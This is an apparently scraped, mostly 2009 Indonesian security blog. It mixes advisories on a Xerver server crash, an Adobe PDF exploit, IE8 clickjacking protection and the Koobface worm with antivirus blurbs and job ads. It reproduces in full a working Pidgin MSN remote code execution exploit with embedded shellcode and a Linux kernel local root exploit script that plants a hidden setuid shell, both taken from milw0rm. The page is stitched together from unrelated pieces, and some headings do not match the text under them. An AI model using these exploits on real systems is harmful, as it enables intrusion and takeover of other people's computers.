Xerver HTTP Server Remote Denial of Service  

Wednesday, December 9, 2009

Xerver v4.32 is a Windows based HTTP server. This is the latest version of
the application available.

Xerver v4.32 is vulnerable to a remote denial of service through the following means.

Xerver ships with a web-based configuration program, which makes this DoS remote
whenever the Remote Setup is running.

The admin package runs on port 32123 and does not require any form of
authentication to make changes to the server configuration.

- Bug -

If the HTTP server port is set to any combination of letters, the server will
crash and cannot be restarted until the configuration file is manually edited
to remove the letters and put a number (i.e. 80) back.

- Example -

1. http://172.16.2.101:32123/?action=wizardStep1
2. Enter anything in the port field, "Dr_IDE"
3. Click Save and Continue

- Results -

The server will crash hard, and you will be unable to restart it. You must edit the
configuration file, Xerver2.cfg, and replace the first line of the file with a port
number.

- Note -

I tried to make this a possible XSS attack but I couldn't manage. Perhaps someone
else can figure it out.

Methods and variables of interest for this attack:

SubmitForm()
document.myForm.portNR.value="80" // default; any letters here would kill the server

source milw0rm.com


Virus spreading via PDF  

Sunday, November 1, 2009

Virus writers have created an exploit for an unpatched vulnerability in Adobe Flash Player, Acrobat and Acrobat Reader. The vulnerability exists in these applications on all platforms: Windows, OS X, Linux and Solaris.

The vulnerable products are:

* Adobe Reader 9.1.2 and earlier 9.x versions
* Adobe Flash Player 9.0.159.0 and 10.0.22.87 and earlier 9.x and 10.x versions

You can read the alert from Adobe at: http://www.adobe.com/support/security/advisories/apsa09-03.html

The exploit runs with the privileges of the current user. The known virus is delivered as a PDF file which could be attached to an email or posted on a web page.

OIT has seen an instance of an infected computer sending email with .PDF attachments. The emails had a message saying the attachment was an e-card or an invoice for a recent purchase. The usual warnings apply: if you weren't expecting an email with an attachment, don't open the PDF attachment. If you don't know the sender, don't open the PDF attachment.

The malicious PDF contains Flash content. In the Windows environment, if the malicious PDF is opened with an Adobe product, it will exploit the vulnerability via the Flash Player .dll called authplay.dll. On a Windows system, it is apparently possible to disable the connection between Acrobat and Flash by renaming that .dll and one in the same directory called rt3d.dll. This is the only workaround at this time. There are alternate PDF viewers that would not be vulnerable.

According to malware analysts, the exploit will work on Windows 9x, NT, 2K, XP, Vista, Server 2000 and Server 2003.

Adobe is working on a patch and says it will be ready for all platforms except Solaris on 7/30/09. So until then, use caution when opening that PDF. If you receive a PDF that crashes Acrobat, I'd like to know.

source oit.ncsu.edu


IE8 Clickjacking Protection Exposed  

Yesterday I published a blind analysis of the so called “Clickjacking protection” included in IE8 RC1. “Blind” because, hype aside, there was no technical documentation available, even if the feature was targeted to web developers who — in order to protect their users — should modify the way their pages are served.

After a while, Microsoft’s David Ross sent me an email confirming that my wild guesses about IE8’s approach, its scope and its limitations were indeed correct. The only information obviously missing from my “prophetic” description was the real name of the “X-I-Do-Not-Want-To-Be-Framed-Across-Domains” HTTP header to be sent with the sensitive pages, and today this little mystery has finally been unveiled by Eric Lawrence on the IE Blog:

Web developers can send a HTTP response header named X-FRAME-OPTIONS with HTML pages to restrict how the page may be framed. If the X-FRAME-OPTIONS value contains the token DENY, IE8 will prevent the page from rendering if it will be contained within a frame. If the value contains the token SAMEORIGIN, IE will block rendering only if the origin of the top level-browsing-context is different than the origin of the content containing the X-FRAME-OPTIONS directive. For instance, if http://shop.example.com/confirm.asp contains a DENY directive, that page will not render in a subframe, no matter where the parent frame is located. In contrast, if the X-FRAME-OPTIONS directive contains the SAMEORIGIN token, the page may be framed by any page from the exact http://shop.example.com origin.

As I had anticipated, IE8’s “clickjacking protection” is just an alternate scriptless way to perform frame busting, a well known and simple technique to prevent a page from being “framed” in another page and therefore becoming an easy UI Redressing target. Microsoft had to follow its own special path because the traditional JavaScript implementation can be easily circumvented on IE, e.g. by loading the targeted page inside an IFRAME SECURITY=restricted element. But the other major browsers are equally “protected” (if we can call “browser protection” something relying on the good will and education of web authors) by “standard” frame busting. Therefore, slogans like “the first browser to counter this type of threat” (James Pratt, Microsoft senior product manager) were marketspeak at its best. Furthermore, this approach is useless against Clickjacking in its original “historical” meaning, i.e. those attacks involving Flash applets and other kinds of plugin embeddings which led Robert “RSnake” Hansen and Jeremiah Grossman to invent the successful buzzword.
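The IE8 rule quoted above from the IE Blog (DENY always blocks inside a frame; SAMEORIGIN compares the origin of the top-level browsing context, not the immediate parent, with the origin of the page carrying the header), modelled in Python as an added example that is not part of the original post. The function names, the sample URLs and the treatment of a value carrying neither token as unrestricted are my assumptions, not anything the post or IE8 documents.

```python
import re
from urllib.parse import urlsplit

# Added example (not from the post): a model of the IE8 X-FRAME-OPTIONS
# decision described on the IE Blog. All URLs used below are constructed.

DEFAULT_PORTS = {"http": 80, "https": 443}


def origin_of(url):
    """Origin of a URL as (scheme, host, port): lower-cased scheme and host,
    default port filled in, so http://A/ and HTTP://A:80/ compare equal."""
    parts = urlsplit(url)
    scheme = parts.scheme.lower()
    host = (parts.hostname or "").lower()
    port = parts.port if parts.port is not None else DEFAULT_PORTS.get(scheme)
    return (scheme, host, port)


def xfo_tokens(header_value):
    """Upper-cased tokens of an X-FRAME-OPTIONS value. The IE Blog text says
    IE8 checks whether the value *contains* the DENY or SAMEORIGIN token, so
    the value is tokenised instead of compared as one string."""
    return {tok.upper() for tok in re.split(r"[\s,;]+", header_value.strip()) if tok}


def may_render_in_frame(headers, page_url, top_url, framed=True):
    """Return True if IE8 renders the page, False if the header blocks it.

    headers  : response headers of the page (names matched case-insensitively)
    page_url : URL of the response that carries the X-FRAME-OPTIONS header
    top_url  : URL of the top-level browsing context (the outermost window),
               which is what IE8 compares against, not the immediate parent
    framed   : False when the page *is* the top-level document
    """
    if not framed:
        return True  # the directive only applies to content inside a frame
    value = next((v for k, v in headers.items() if k.lower() == "x-frame-options"), None)
    if value is None:
        # No directive: the browser does nothing. This is the post's point that
        # the protection relies entirely on the cooperation of the web author.
        return True
    tokens = xfo_tokens(value)
    if "DENY" in tokens:
        return False  # never renders in a subframe, wherever the parent lives
    if "SAMEORIGIN" in tokens:
        return origin_of(page_url) == origin_of(top_url)
    # Assumption (not stated in the post): a value with neither token imposes
    # no restriction.
    return True


if __name__ == "__main__":
    confirm = "http://shop.example.com/confirm.asp"  # constructed sample page
    cases = [
        ({"X-FRAME-OPTIONS": "DENY"}, "http://shop.example.com/"),
        ({"X-FRAME-OPTIONS": "SAMEORIGIN"}, "http://shop.example.com/cart"),
        # A same-site wrapper frame sitting inside a foreign top-level page:
        # the top-level origin is what counts, so SAMEORIGIN still blocks.
        ({"X-FRAME-OPTIONS": "SAMEORIGIN"}, "http://attacker.example/"),
        ({}, "http://attacker.example/"),
    ]
    for hdrs, top in cases:
        verdict = "renders" if may_render_in_frame(hdrs, confirm, top) else "blocked"
        print(f"{hdrs.get('X-FRAME-OPTIONS', '<no header>'):<12} top={top:<30} {verdict}")
```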

However in my post I had also written that having such a scriptless alternative as a cross-browser option would be nice:

I do believe that a declarative approach to control subdocument requests is an excellent idea: otherwise I wouldn’t have included the SUB pseudo-method in ABE Rules Specification (pdf). Moreover, as soon as I’ve got some less blurry info (David Ross, I know you’re listening, why don’t you drop me a line?), I’ll be happy to immediately implement a compatible feature in NoScript and lobby Mozilla for inclusion in Firefox 3.1.

David kindly answered

I think this would be fantastic and it’s a great place to start building some bridges.

I agree; in fact I’ve filed an enhancement request for Firefox, and I’m already working to release a NoScript development build featuring X-FRAME-OPTIONS support: that’s relatively easy, since I can hook in the work I’m already doing for the ABE module. (Update 2009-29-01: I just released the NoScript 1.8.9.9 development build, featuring full experimental X-FRAME-OPTIONS compatibility support).
It’s worth noting, though, that this is just a cross-browser compatibility effort: neither Firefox nor NoScript really needs this feature. Traditional JavaScript-based frame busting works fine in Firefox, giving it the same degree of (modest) “protection” as IE8. NoScript users, on the other hand, are already fully protected, because ClearClick is the one and only countermeasure which works against any type of Clickjacking (frame or embed based), no matter whether web sites cooperate or not.

Speaking of NoScript, I’ve got a small but important correction to the otherwise excellent article Robert McMillan wrote for PC World (IDG News) yesterday:

Because clickjacking requires scripting, the attack doesn’t work when NoScript is enabled.

This statement is wrong twice:

1. Clickjacking does not require scripting: JavaScript might make the attacker’s life easier, but it’s not indispensable to throw an attack.
2. NoScript does not need scripting to be disabled in order to protect its users against Clickjacking: its exclusive ClearClick anti-Clickjacking technology works independently from script blocking.

That’s why NoScript can be recommended to anyone, even to grandma who’s not inclined to block JavaScript: albeit I do not encourage using NoScript’s “Allow Scripts Globally” command because the default deny policy is your best first-line defense, many additional protection features such as Anti-XSS filters and ClearClick still remain active even when JavaScript is enabled, providing the safest web experience available in any browser.

source hackademix.net


Pidgin MSN 2.5.8 Remote Code Execution  

Pidgin MSN <= 2.5.8 Remote Code Execution

Pierre Nogues - pierz@hotmail.it
http://www.indahax.com/

Description:
Pidgin is a multi-protocol Instant Messenger.

This is an exploit for the vulnerability[1] discovered in Pidgin by core-security[2].
The library "libmsn" used by pidgin doesn't handle specially crafted MsnSlp packets
which could lead to memory corruption.

Affected versions :
Pidgin <= 2.5.8, Adium and other IM clients using the Pidgin libpurple/libmsn library.

Platforms :
Windows, Linux, Mac

Fix :
Fixed in Pidgin 2.5.9
Update to the latest version : http://www.pidgin.im/download/

References :
[1] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2694
[2] http://www.coresecurity.com/content/libpurple-arbitrary-write
[3] http://www.pidgin.im/news/security/?id=34

Usage :
You need the Java MSN Messenger library : http://sourceforge.net/projects/java-jml/
javac.exe -cp "%classpath%;.\jml-1.0b3-full.jar" PidginExploit.java
java -cp "%classpath%;.\jml-1.0b3-full.jar" PidginExploit YOUR_MSN_EMAIL YOUR_PASSWORD TARGET_MSN_EMAIL

import net.sf.jml.*;
import net.sf.jml.event.*;
import net.sf.jml.impl.*;
import net.sf.jml.message.p2p.*;
import net.sf.jml.util.*;

public class PidginExploit {

private MsnMessenger messenger;
private String login;
private String password;
private String target;

private int session_id = NumberUtils.getIntRandom();

private byte shellcode[] = new byte[] {

/*
* if you use the stack in your shellcode do not forget to change esp because eip == esp == kaboom !
* sub esp,500
*/
(byte) 0x81, (byte) 0xEC, (byte) 0x00, (byte) 0x05, (byte) 0x00, (byte) 0x00,


/*
* windows/exec - 121 bytes
* http://www.metasploit.com
* EXITFUNC=process, CMD=calc.exe
*/
(byte) 0xfc, (byte) 0xe8, (byte) 0x44, (byte) 0x00, (byte) 0x00, (byte) 0x00, (byte) 0x8b, (byte) 0x45,
(byte) 0x3c, (byte) 0x8b, (byte) 0x7c, (byte) 0x05, (byte) 0x78, (byte) 0x01, (byte) 0xef, (byte) 0x8b,
(byte) 0x4f, (byte) 0x18, (byte) 0x8b, (byte) 0x5f, (byte) 0x20, (byte) 0x01, (byte) 0xeb, (byte) 0x49,
(byte) 0x8b, (byte) 0x34, (byte) 0x8b, (byte) 0x01, (byte) 0xee, (byte) 0x31, (byte) 0xc0, (byte) 0x99,
(byte) 0xac, (byte) 0x84, (byte) 0xc0, (byte) 0x74, (byte) 0x07, (byte) 0xc1, (byte) 0xca, (byte) 0x0d,
(byte) 0x01, (byte) 0xc2, (byte) 0xeb, (byte) 0xf4, (byte) 0x3b, (byte) 0x54, (byte) 0x24, (byte) 0x04,
(byte) 0x75, (byte) 0xe5, (byte) 0x8b, (byte) 0x5f, (byte) 0x24, (byte) 0x01, (byte) 0xeb, (byte) 0x66,
(byte) 0x8b, (byte) 0x0c, (byte) 0x4b, (byte) 0x8b, (byte) 0x5f, (byte) 0x1c, (byte) 0x01, (byte) 0xeb,
(byte) 0x8b, (byte) 0x1c, (byte) 0x8b, (byte) 0x01, (byte) 0xeb, (byte) 0x89, (byte) 0x5c, (byte) 0x24,
(byte) 0x04, (byte) 0xc3, (byte) 0x5f, (byte) 0x31, (byte) 0xf6, (byte) 0x60, (byte) 0x56, (byte) 0x64,
(byte) 0x8b, (byte) 0x46, (byte) 0x30, (byte) 0x8b, (byte) 0x40, (byte) 0x0c, (byte) 0x8b, (byte) 0x70,
(byte) 0x1c, (byte) 0xad, (byte) 0x8b, (byte) 0x68, (byte) 0x08, (byte) 0x89, (byte) 0xf8, (byte) 0x83,
(byte) 0xc0, (byte) 0x6a, (byte) 0x50, (byte) 0x68, (byte) 0x7e, (byte) 0xd8, (byte) 0xe2, (byte) 0x73,
(byte) 0x68, (byte) 0x98, (byte) 0xfe, (byte) 0x8a, (byte) 0x0e, (byte) 0x57, (byte) 0xff, (byte) 0xe7,
(byte) 0x63, (byte) 0x61, (byte) 0x6c, (byte) 0x63, (byte) 0x2e, (byte) 0x65, (byte) 0x78, (byte) 0x65,
(byte) 0x00
};

// reteip = pointer to the return address in the stack
// The shellcode will be written just before reteip,
// and reteip will automatically point to the shellcode. It's magic !
private int reteip = 0x0022CFCC; //stack on XP SP3-FR Pidgin 2.5.8

private int neweip;
private byte[] payload = new byte[shellcode.length + 4];
private int totallength = reteip + 4;

public static void main(String[] args) throws Exception {

if(args.length != 3){
System.out.println("PidginExploit YOUR_MSN_EMAIL YOUR_PASSWORD TARGET_MSN_EMAIL");
}else{
PidginExploit exploit = new PidginExploit(args[0],args[1],args[2]);
exploit.start();
}

}

public PidginExploit(String login, String password, String target){
this.login = login;
this.password = password;
this.target = target;

neweip = reteip - shellcode.length ;

for(int i=0;i<shellcode.length;i++) payload[i] = shellcode[i];

payload[shellcode.length] = (byte)(neweip & 0x000000FF);
payload[shellcode.length + 1] = (byte)((neweip & 0x0000FF00) >> 8);
payload[shellcode.length + 2] = (byte)((neweip & 0x00FF0000) >> 16);
payload[shellcode.length + 3] = (byte)((neweip & 0xFF000000) >> 24);
}

public void start() {
messenger = MsnMessengerFactory.createMsnMessenger(login,password);
messenger.getOwner().setInitStatus(MsnUserStatus.ONLINE);

messenger.setLogIncoming(false);
messenger.setLogOutgoing(false);

initMessenger(messenger);
messenger.login();
}

protected void initMessenger(MsnMessenger messenger) {

messenger.addContactListListener(new MsnContactListAdapter() {

public void contactListInitCompleted(MsnMessenger messenger) {

final Object id = new Object();

messenger.addSwitchboardListener(new MsnSwitchboardAdapter() {

public void switchboardStarted(MsnSwitchboard switchboard) {

if (id != switchboard.getAttachment())
return;

switchboard.inviteContact(Email.parseStr(target));
}

public void contactJoinSwitchboard(MsnSwitchboard switchboard, MsnContact contact) {
if (id != switchboard.getAttachment())
return;

MsnP2PSlpMessage msg = new MsnP2PSlpMessage();
msg.setIdentifier(NumberUtils.getIntRandom());
msg.setSessionId(session_id);
msg.setOffset(0);
msg.setTotalLength(totallength);
msg.setCurrentLength(totallength);

// This flag creates a bogus MsnSlpPacket in Pidgin's memory with a buffer pointing to null
// We'll use this buffer to rewrite memory in the stack
msg.setFlag(0x1000020);

msg.setP2PDest(target);

switchboard.sendMessage(msg);

System.out.println("First packet sent, waiting for the ACK");

}

public void switchboardClosed(MsnSwitchboard switchboard) {
System.out.println("switchboardClosed");
switchboard.getMessenger().removeSwitchboardListener(this);
}

public void contactLeaveSwitchboard(MsnSwitchboard switchboard, MsnContact contact){
System.out.println("contactLeaveSwitchboard");
}
});
messenger.newSwitchboard(id);
}
});

messenger.addMessageListener(new MsnMessageAdapter(){

public void p2pMessageReceived(MsnSwitchboard switchboard,MsnP2PMessage message,MsnContact contact) {

//We receive the ACK of our first packet with the ID of the new bogus packet
message.getIdentifier();

MsnP2PDataMessage msg = new MsnP2PDataMessage(session_id, message.getIdentifier(), neweip,
payload.length, payload, target);

switchboard.sendMessage(msg);
System.out.println("ACK received && Payload sent !");
System.out.println("Exploit OK ! CTRL+C to quit");

}
});



messenger.addMessengerListener(new MsnMessengerAdapter() {

public void loginCompleted(MsnMessenger messenger) {
System.out.println(messenger.getOwner().getEmail() + " login");
}

public void logout(MsnMessenger messenger) {
System.out.println(messenger.getOwner().getEmail() + " logout");
}

public void exceptionCaught(MsnMessenger messenger,
Throwable throwable) {
System.out.println("caught exception: " + throwable);
}
});

}
}

// Original source milw0rm.com [2009-09-09]


Process Explorer v11.33  

Sunday, September 27, 2009

Ever wondered which program has a particular file or directory open? Now you can find out. Process Explorer shows you information about which handles and DLLs processes have opened or loaded.

The Process Explorer display consists of two sub-windows. The top window always shows a list of the currently active processes, including the names of their owning accounts, whereas the information displayed in the bottom window depends on the mode that Process Explorer is in: if it is in handle mode you'll see the handles that the process selected in the top window has opened; if Process Explorer is in DLL mode you'll see the DLLs and memory-mapped files that the process has loaded. Process Explorer also has a powerful search capability that will quickly show you which processes have particular handles opened or DLLs loaded.

The unique capabilities of Process Explorer make it useful for tracking down DLL-version problems or handle leaks, and provide insight into the way Windows and applications work.

source technet.microsoft.com


Facebook Worm Koobface  

Koobface, the Facebook worm that takes over computers by spreading through the social network, is back in a new form. The newly tweaked Facebook worm works like its predecessor, only with an updated look and code that might not be caught as quickly.
Facebook Worm 2.0

Koobface tricks you into following a link that looks like it’s from a friend. It’ll usually look like a link to a video of someone you know. Once you open the link, though, you’ll be told you need to download an update to your video player. That update is actually the Facebook worm threat in disguise.

The new variant, discovered by researchers at Trend Micro, poses as a YouTube page. It’ll even display your name and photo from Facebook to give a nonthreatening appearance to unsuspecting users.


Facebook-Aided Virus Spread

Once you agree to install the software it offers, the Koobface worm will take over your computer and hijack your Facebook account. It’ll then live up to its Facebook virus reputation by sending messages to your friends and attempting to infect them.

“It also sends and receives information from an infected machine by connecting to several servers,” says Trend Micro’s Rik Ferguson. “This allows hackers to execute commands on the affected machine.”

The new Koobface virus has also been detected on several other social networks, including MySpace, Bebo, Friendster, Hi5, and Live Journal.
Koobface Protection

Keeping yourself safe from Koobface is simple: Be very cautious of what you click. Even if something appears to have come from a friend, remember that their account could be infected and the message may not actually be from them. Make sure you know where you’re going before you click.

Once you do follow a link, never install software updates directly from that page. If you receive a notice that you need an update for your Adobe Flash player, navigate directly to adobe.com and look for the update at the original source. That’s the safest way to know you’re getting the real deal, and not a Facebook worm in disguise.

source facebook-worm-koobface/


Notepad++ 5.4.5 Local .C/CPP Stack Buffer Overflow POC  

FIXES
Notepad++ v5.4.5 fixed bugs (from v5.4.4)
1. Fix plugin shortcuts not working.
2. Fix the toolbar tooltip display bug for plugin icons.
3. Fix a crash that occurred when searching in files from a deep path.
4. Fix a crash (Unicode binary) when closing Notepad++ with an RC file open under Chinese XP.
5. Fix Pascal and Scheme syntax highlighting problems (fixes in styles.xml).
6. Add SQL folding capability.

source milw0rm.com


Free Antivirus Computer Security  

Saturday, July 25, 2009

PCMAV Valkyrie Antivirus, PCMAV 2.0c Download
PCMAV Valkyrie Antivirus, PCMAV 2.0b Download
Remover Sality antivirus, download


Senior Services Sales Vacancy  

STOP TALKING, START DOING!
IBM has always delivered technology innovation to our customers. Now we partner with them in their business, helping them become a special company and stay special. To make our customers special, we need people who are above the ordinary.
IBM Indonesia recruits best-in-class professionals to deliver best-of-breed IT solutions and services to customers.
Do you have the confidence? Do you have the enthusiasm? Do you have the insight to partner with customers, deliver solutions and have a significant positive impact on their business?

SENIOR SERVICES SALES – FINANCIAL SECTOR

(POSITION CODE: GTS-0240897)

Responsibilities:

* Facilitate opportunity identification and apply sales skills to engage and close opportunities with key decision makers.
* Responsible for sales results for the selected solution within the assigned territory.
* Understand the competition and develop an appropriate sales strategy.
* Maintain deep technical skills on IBM products and working knowledge of the rest of the services product portfolio, as well as a basic understanding of Infrastructure Solutions.
Desired Candidate:

* Minimum of Bachelor Degree from any background.
* Experience in I/T industry in Sales / Account Manager for minimum 5 years.
* Working experience in handling financial sector.
* High drive towards achievement.
* Proficient level for English and Bahasa Indonesia, both written and spoken.

Submit your application through ibm.com/employment/id, at the latest by August 15th, 2009. Search for the position code and apply through IBM career portal.

Only shortlisted candidates will be contacted.


source. jobsdb.com


Professional Sales Executive for IT Products Vacancy  

Saturday, May 23, 2009

PT InMarc Indonesia is a fast-growing marketing agency with a strong business foundation in Indonesia's major IT industries, supporting worldwide brands such as Microsoft, Dell and Hewlett Packard. We are looking for the following candidates for our expansion:
Professional Sales Executive for IT Products (SALES)

Available Position: 10
Work location: Jakarta
Level of education: Min. D3 in Any Major
Work experience: 2 Years, Fresh Graduates are encouraged to Apply but commitment is required.
Gender: Male / Female
Marital Status: Single
Age: 23 – 30 years old


General Requirements:

* Living in West or North of Jakarta
* At least 2 years of experience, Fresh Graduates are encouraged to Apply but commitment is required.
* Computer Literate is a must
* Attractive, sociable and Mature
* Pleasant personality with good communication skill
* Highly creative, self motivated, strong-drive, good analytical, hard worker and should be able to work under pressure to meet deadline or target
* Target Oriented & good team work.
* Have own vehicle (for Sales)



Please send your application letter with a detailed resume/CV, stating your qualifications, a summary of your experience, present/expected salary, other supporting documents and a current photograph, no later than 30 May 2009 after this advertisement, to:

PT InMarc Indonesia
Muara Karang Blok M9 Selatan No.71-72
Jakarta 14450
Hrd.inmarc@gmail.com

Or you can check our website on:
www.marathonrewards.com; www.hp-runner.com; www.wm-runner.com

We regret that only shortlisted candidates will be notified.

Coppermine Photo Gallery 1.4.22 Remote Exploit  

Requires register_globals = on and magic_quotes_gpc = off
Based on vulnerabilities discussed at http://www.milw0rm.org/exploits/8713
Coppermine Photo Gallery 1.4.22 Remote Exploit

Coded by girex

source. milw0rm


Eset Nod32 Antivirus  

Tuesday, May 12, 2009

Integrated, Real-Time Protection against viruses, worms, trojans, spyware, adware, phishing, and hackers. Best detection, fastest performance & smallest footprint. NOD32 Antivirus System provides well balanced, state-of-the-art protection against threats endangering your PC and enterprise systems running various platforms from Microsoft Windows, through a number of UNIX/Linux, Novell, MS DOS operating systems to Microsoft Exchange Server, Lotus Domino and other mail servers.

ESET solutions are built on ESET’s one-of-a-kind ThreatSense technology. This advanced heuristics engine enables proactive detection of malware not covered by even the most frequently updated signature-based products by decoding and analyzing executable code in real time, using an emulated environment. By allowing malware to execute in a secure virtual world, ESET is able to clearly differentiate between benign files and even the most sophisticated and cleverly-disguised malware.
Users of Microsoft® Windows® can experience the power and elegance of NOD32’s ThreatSense Technology with ease and comfort. Our single optimized engine offers the best protection from viruses, spyware, adware, phishing attacks, and more. Keep tomorrow’s threats at bay with our proactive detection technology.

XSS (Cross Site Scripting) Cheat Sheet  

Note from the author: XSS is Cross Site Scripting. If you don't know how XSS (Cross Site Scripting) works, this page probably won't help you. This page is for people who already understand the basics of XSS attacks but want a deep understanding of the nuances regarding filter evasion. This page will also not show you how to mitigate XSS vectors or how to write the actual cookie/credential stealing/replay/session riding portion of the attack. It will simply show the underlying methodology and you can infer the rest. Also, please note my XSS page has been replicated by the OWASP 2.0 Guide in the Appendix section with my permission. However, because this is a living document I suggest you continue to use this site to stay up to date.

Also, please note that most of these cross site scripting vectors have been tested in the browsers listed at the bottom of the page; however, if you have specific concerns about outdated or obscure versions, please download them from Evolt. Please see the XML format of the XSS Cheat Sheet if you intend to use CAL9000 or other automated tools. If you have an RSS reader, feel free to subscribe to the Web Application Security RSS feed below, or join the forum.

source. RSnake


Linux kernel local root exploit information  

Sunday, April 12, 2009

#!/bin/sh


# gw-notexit.sh: Linux kernel <2.6.29 exit_notify() local root exploit
#
# by Milen Rangelov (gat3way-at-gat3way-dot-eu)
#
# Based on the 'exit_notify()' CAP_KILL verification bug found by Oleg Nesterov.
# Basically it allows us to send arbitrary signals to a privileged (suidroot)
# parent process. Due to a bad check, the child process with appropriate exit signal
# already set can first execute a suidroot binary then exit() and thus bypass
# in-kernel privilege checks. We use chfn and gpasswd for that purpose.
#
# !!!!!!!!!!!
# Needs /proc/sys/fs/suid_dumpable set to 1 or 2. The default is 0
# so you'll be out of luck most of the time.
# So it is not going to be the script kiddies' new killer shit :-)
# !!!!!!!!!!!
#
# if you invent a better way to escalate privileges by sending arbitrary signals to
# the parent process, please mail me :) That was the best I could think of today :-(
#
# This one made me nostalgic about the prctl(PR_SET_DUMPABLE,2) madness
#
# Skuchna rabota...
#
####################################################################################




SUIDDUMP=`cat /proc/sys/fs/suid_dumpable`
if [ $SUIDDUMP -lt 1 ]; then echo -e "suid_dumpable=0 - system not vulnerable!\n";exit; fi
if [ -d /etc/logrotate.d ]; then
echo "logrotate installed, that's good!"
else
echo "No logrotate installed, sorry!";exit
fi

echo -e "Compiling the bash setuid() wrapper..."
cat >> /tmp/.m.c << EOF
#include <stdio.h>
#include <unistd.h>

int main()
{
setuid(0);
execl("/bin/bash","[kthreadd]",NULL);
}
EOF

cc /tmp/.m.c -o /tmp/.m
rm /tmp/.m.c

echo -e "Compiling the exploit code..."

cat >> /tmp/exploit.c << EOF
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <signal.h>
#include <sched.h>

int child(void *data)
{
sleep(2);
printf("I'm gonna kill the suidroot father without having root rights :D\n");
execl("/usr/bin/gpasswd","%s",NULL);
exit(0);
}

int main()
{
int stacksize = 4*getpagesize();
void *stack, *stacktop;
stack = malloc(stacksize);
stacktop = stack + stacksize;
chdir("/etc/logrotate.d");
int p = clone(child, stacktop, CLONE_FILES|SIGSEGV, NULL);
if (p>0) execl("/usr/bin/chfn","\n/tmp/.a\n{\nsize=0\nprerotate\n\tchown root /tmp/.m;chmod u+s /tmp/.m\nendscript\n}\n\n",NULL);
}
EOF

cc /tmp/exploit.c -o /tmp/.ex
rm /tmp/exploit.c

echo -e "Setting coredump limits and running the exploit...\n"
ulimit -c 10000
touch /tmp/.a
`/tmp/.ex >/dev/null 2>/dev/null`
sleep 5
rm /tmp/.ex

if [ -e /etc/logrotate.d/core ]; then
echo -e "Successfully coredumped into the logrotate config dir\nNow wait until cron.daily executes logrotate and makes your shell wrapper suid\n"
echo -e "The shell should be located in /tmp/.m - just run /tmp/.m after 24h and you'll be root"
echo -e "\nYour terminal is most probably screwed now, sorry for that..."
exit
fi

echo "The system is not vulnerable, sorry :("

# milw0rm.com [2009-04-08]

Eliminating Google's Malware/Badware Label  

Monday, April 6, 2009

There are a few things you need to know:
Malware (short for "malicious software", i.e. software that compromises a system) is a computer program written for the specific purposes of its author, and it looks for weaknesses in other software. Malware is generally created to break into or destroy a piece of software or an operating system. (Wikipedia)

Badware is malicious software that tracks your moves online and feeds that information back to shady marketing groups so that they can ambush you with targeted ads. If your every move online is checked by a pop-up ad, it's highly likely that you, like 59 million Americans, have spyware or other malicious badware on your computer.(Stopbadware.org)

Google, as the biggest search engine in the world, wants to give searchers clean and safe results, both on the website side and the SEO side. On the website side in particular, besides crawling, Google also scans websites to check whether they contain scripts that fall into the malware/badware category.

In this activity Google works together with stopbadware.org to notify:
the administrator of the suspected website. Google will usually send email to:

abuse@website.com
admin@website.com
administrator@website.com
contact@website.com
info@website.com *

so you should set up one of the above mailboxes as a precaution, to receive the notification Google sends if your website is hit with the malware label.
Google also informs the public (Google Search users) that the website contains malware, by displaying a warning like this:



Cause:
One way malware/badware gets into your website is through a virus on your own computer: when you update the website (uploading PHP or HTML files), whether via FTP or a browser, the virus injects malware/badware script into the website's pages without you noticing. When Google then scans the site and finds the malware/badware script, it labels your website Badware/Malware in its SERP.
Google also informs the public (Google Search users) that the website contains malware.

How to fix it:

To remove the Badware/Malware label from Google's SERP, you need to do the following:
1. Clean the malware/badware script out of your website's scripts
2. Request a review from stopbadware.org
3. Request a review from Google

Special to poin which to 3. that is requesting review side of Google, its way is

1. You need a Google account, which can be a Google (Gmail) email account.

2. Go to http://google.com/accounts and choose Webmaster / Webmaster Tools.
3. If that menu is not shown, you must first sign up for Google Webmaster Tools.
4. Register your website in Google Webmaster Tools, then complete the verification.
5. After verification, open the Overview menu and click the link Review site.

Wait 2 x 24 hours. stopbadware.org will review your website, and if it is really clear of malware/badware they will contact Google, which will then review it directly.

Once they confirm that your website is really clean, the Badware/Malware label in Google's SERP will be removed soon after. Removing the label usually takes about 1 x 24 hours... so be patient :)



AVG Internet Security 8.5  

Monday, March 23, 2009

Comprehensive real-time protection against viruses, spyware, identity theft, poisoned web pages, and all types of malware that can threaten your valuable personal information. Prevention is better than cure! Comprehensive cyberthreat prevention for Windows-based home users from one of the World's most trusted security companies.

Features:

All-in-one protection
Antivirus and Anti-Spyware: protection against viruses, worms, spyware, and trojans
Identity Protection: helps prevent identity theft
Anti-Rootkit: protection against hidden threats (rootkits)
Web Shield: screens downloads and IM for infections
LinkScanner: blocks poisoned web pages in real time
Anti-Spam with anti-phishing: filters out unwanted and fraudulent e-mails
Firewall: blocks hacker attacks
System Tools: tailor AVG for your particular needs
Easy-to-use, automated protection

AVG Internet Security gives you maximum protection with real-time scanning, automatic updates, low-impact background scanning for online threats, and instant quarantining or removal of infected files. Every interaction between your computer and the Internet is analyzed to ensure nothing can get onto your system without your knowledge.

AVG checks in real time:
All files including documents, photos, music, and applications
E-mails (all major email programs like Microsoft Outlook and Thunderbird supported)
Instant messaging and P2P communications
File downloads and online transactions such as shopping and banking
Search results and any other web links you click on
Internet Security – prevention is better than cure

AVG Internet Security provides multiple layers of protection to ensure nothing slips through.
NEW Identity Theft Protection prevents new and unknown threats from stealing your personal information like bank and credit card details.
LinkScanner checks every link, making sure you're safe searching the internet and surfing the web, minimizing the risk of you accidentally visiting a poisoned web page.
Web Shield detects and blocks malware threats in file downloads and instant-messaging conversations.
The Firewall stops hackers from accessing and misusing your computer.
Antivirus, Anti-Spyware, and Anti-Rootkit detect and root out all manner of malicious software, no matter how stealthy it may be.

You didn't buy your computer to worry about security. So let AVG Internet Security do the worrying for you while you get on with your online life.
Tailor AVG just for you

AVG's System Tools let you easily configure your privacy settings, connections, and browser plug-ins all in one place.
The best Windows protection - trusted by millions of users

AVG's award-winning antivirus technology protects more than 80 million users and is certified by major antivirus testing organizations (VB100%, ICSA, West Coast Labs Checkmark).
No hidden costs

When you purchase an AVG product, everything you need is included in the price for the full license duration - technical support, virus updates, and new program versions. All users of paid AVG products also qualify for generous discounts on subscription renewals and product upgrades.
Flexible licensing
AVG Internet Security can be purchased online in license packs for 1-10 computers, with one- or two-year subscriptions available.


Make New Extension Executable File  

